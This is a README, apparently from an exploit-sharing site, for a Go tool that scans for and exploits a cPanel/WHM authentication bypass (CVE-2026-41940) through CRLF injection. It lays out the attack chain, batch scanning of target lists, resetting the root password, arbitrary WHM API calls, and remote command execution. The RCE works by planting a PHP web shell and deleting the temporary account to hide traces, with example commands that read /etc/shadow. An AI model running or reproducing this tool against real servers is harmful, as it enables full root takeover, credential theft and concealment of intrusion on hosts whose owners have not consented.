## https://sploitus.com/exploit?id=6F345D91-C8C2-5707-AEA6-A6F2397FEE4F
# cPanel/WHM Auth Bypass Scanner & Exploit Tool
A Go command-line tool based on the Python PoC rewrite by [watchTowr](https://github.com/watchTowr). It is used to detect and exploit the **CVE-2026-41940** cPanel/WHM authentication bypass vulnerability. ## Vulnerability Overview
CVE-2026-41940 is an authentication bypass vulnerability in cPanel/WHM. The attack chain involves injecting CRLF characters into the Basic Auth header, revealing the security token and gaining WHM root privileges. **The attack chain consists of 4 stages:**
1. **Pre-authentication** – Sending incorrect credentials to `/login/` to obtain the original `whostmgrsession` cookie.
2. **CRLF Injection** – Injecting line breaks through the `Authorization: Basic` header, causing the server to reveal the `cpsess` security token in the `Location` header during a 307 redirection.
3. **Token Propagation** – Triggering `do_token_denied` to propagate the injected authentication data from the original storage to the cache.
4. **Permission Verification** – Using the revealed token to access `/json-api/version`, verifying whether root privileges are obtained.
## Features
- **Batch Scanning** – Scanning multiple targets from a file and executing them concurrently.
- **Single Target Detection** – Quickly verifying a single URL.
- **URL Intelligent Handling** – Automatically handling `http://`, `https://`, and protocol-less formats, and automatically deduplicating results.
- **Vulnerability Exploitation**
- Modifying the root password (`-passwd`)
- Calling arbitrary WHM APIs (`-api`)
- Generating a one-click login URL (`-session`)
- Executing remote commands / RCE (`-cmd`)
- **Terminal Highlighting** – `[VULN]` in red, `[SAFE]` in green for highlighting vulnerabilities.
- **Result Saving** – Vulnerability URLs are automatically saved to a file.
## Compilation
```bash
# Requires Go 1.20+
cd cpanel-checker
go build -o cpanel-checker. ```
## Usage
### Parameter List
| Parameter | Description | Example |
|----------|--------------|--------|
| `-u` | Single target URL | `-u https://1.2.3.4:2087` |
| `-f` | File containing a list of URLs | `-f targets.txt` |
| `-o` | Output file path (default: `result.txt`) | `-o vuln.txt` |
| `-c` | Concurrently executed tasks (default: 10) | `-c 20` |
| `-hostname` | Manually specifying the Host header (default: automatic detection) | `-hostname cpanel.example.com` |
| `-passwd` | Modifying the root password (only for `-u` mode) | `-passwd NewP@ss123` |
| `-api` | Calling WHM API functions (only for `-u` mode) | `-api listaccts` |
| `-api-params` | WHM API parameters, separated by commas | `-api-params user=root,password=123` |
| `-session` | Generating a one-click login URL (only for `-u` mode) | `-session` |
| `-cmd` | Executing remote commands / RCE (only for `-u` mode) | `-cmd "id"` |
### 1. Single Target Detection
```bash./cpanel-checker -u https://target:2087
```
The port defaults to `2087`. The following syntax is equivalent:
```bash./cpanel-checker -u https://target./cpanel-checker -u target
```
### 2. Batch Scanning
```bash./cpanel-checker -f targets.txt -c 20
```
`targets.txt` supports the following format (one per line, `#` lines are comments):
```
https://1.1.1.1:2087
http://2.2.2.2:2087
3.3.3.3:2087
4.4.4.4
# This is a comment
```
- **Automatic Deduplication**: `http://1.1.1.1` and `https://1.1.1.1` are considered the same target, and only scanned once.
- **Protocol-less addresses are automatically completed to `https://`.
- **Address without a port is automatically set to `2087`.**
- Results are saved to `result.txt` (can be customized with `-o`).
### 3. Modifying the Root Password
```bash./cpanel-checker -u https://target:2087 -passwd "NewP@ssw0rd!"
```
### 4. Calling Arbitrary WHM APIs
```bash
# Listing all accounts./cpanel-checker -u https://target:2087 -api listaccts
# Calling an API with parameters./cpanel-checker -u https://target:2087 -api passwd -api-params "user=root,password=abc123"
```
### 5. Generating a One-Click Login URL
```bash./cpanel-checker -u https://target:2087 -session
```
This will generate a URL that can be opened in a browser to access the WHM management panel.
Using the **Terminal** function in the panel allows access to an interactive root shell. > Note: `-session` is **semi-automatic** – after the tool generates the login URL, you need to manually open it in a browser. ### 6. Remote Command Execution (RCE)
```bash./cpanel-checker -u https://target:2087 -cmd "id"./cpanel-checker -u https://target:2087 -cmd "cat /etc/shadow"./cpanel-checker -u https://target:2087 -cmd "uname -a"
```
`-cmd` is **fully automatic**, requiring no additional manual actions. The internal process is as follows:
1. Obtaining root permissions using authentication bypass.
2. Creating a temporary cPanel account via the WHM API.
3. Writing a PHP shell to `~/public_html/` using UAPI (`Fileman::save_file_content`).
4. Executing commands by accessing `https://host/~tmpuser/shell.php` via HTTP.
5. Returning command output.
6. Automatically deleting the temporary account (to clean up traces).
> Prerequisites: The target’s port 80 or 443 must be accessible, and Apache/httpd must be running. ### 7. Combined Use
Multiple usage parameters can be used simultaneously:
```bash
# Simultaneously obtain the login URL, execute commands, and change passwords./cpanel-checker -u https://target:2087 -session -cmd "id" -passwd "NewP@ss123"
```
### 8. Manually Specifying the Host Header
When the target’s IP address does not match the host name configured in cPanel, you can specify it manually:
```bash./cpanel-checker -u https://1.2.3.4:2087 -hostname cpanel.example.com
```
By default, the tool automatically discovers the correct host name through a 307 redirect at `/openid_connect/cpanelid`. ## Output Example
### Batch Scanning
```
[1/5] [VULN] https://1.1.1.1:2087 - token=/cpsess1234567890
[2/5] [SAFE] https://2.2.2.2:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched
[3/5] [SAFE] https://3.3.3.3:2087 - stage1: request failed: dial tcp: i/o timeout
[4/5] [VULN] https://4.4.4.4:2087 - token=/cpsess0987654321
[5/5] [SAFE] https://5.5.5.5:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched
========== Scan Completed ==========
Total: 5 | Vulnerabilities Found: 2
● https://1.1.1.1:2087
● https://4.4.4.4:2087
[+] Results saved to result.txt
```
### RCE Execution
```
[*] Target: https://target:2087
[*] Mode: Vulnerability exploitation
[0] hostname = cpanel.example.com
[1] Creating a preauth session... session base = abc123def456
[2] Sending the CRLF injection (Basic auth + no-ob cookie)... leaked token = /cpsess1234567890
[3] Firing do_token_denied to propagate raw -> cache... gadget fired
[4] Verifying we’re WHM root... [+] Obtained WHM root permissions
[*] Executing remote command (RCE)... [a] Creating a temporary account: tmpabcde
[b] Writing a shell: /home/tmpabcde/public_html/random.php
[c] Executing command: id
[d] Deleting the temporary account: tmpabcde
[+] Command output:
uid=0(root) gid=0(root) groups=0(root)
[+] Done. https://target:2087 has been controlled
```
## Notes
- Usage parameters (`-passwd`, `-api`, `-session`, `-cmd`) are only available in single-target mode with `-u`. They are not supported in batch mode with `-f`.
- The tool defaults to skipping TLS certificate verification.
- The request timeout is 15 seconds.
- Lines starting with `#` in the URL file will be ignored.
## Disclaimer
This tool is for **authorized security testing and research** purposes only. Testing systems without authorization is illegal. Users must ensure they have explicit written permission from the owner of the target system. The author assumes no responsibility for any misuse of this tool. ## Thanks
- Original PoC: [watchTowr](https://github.com/watchTowr) / [Sina Kheirkhah (@SinSinology)](https://twitter.com/SinSinology)
- CVE: CVE-2026-41940
[source-iocs-preserved url=http://`、`https://`、无协议格式,自动去重,https://`]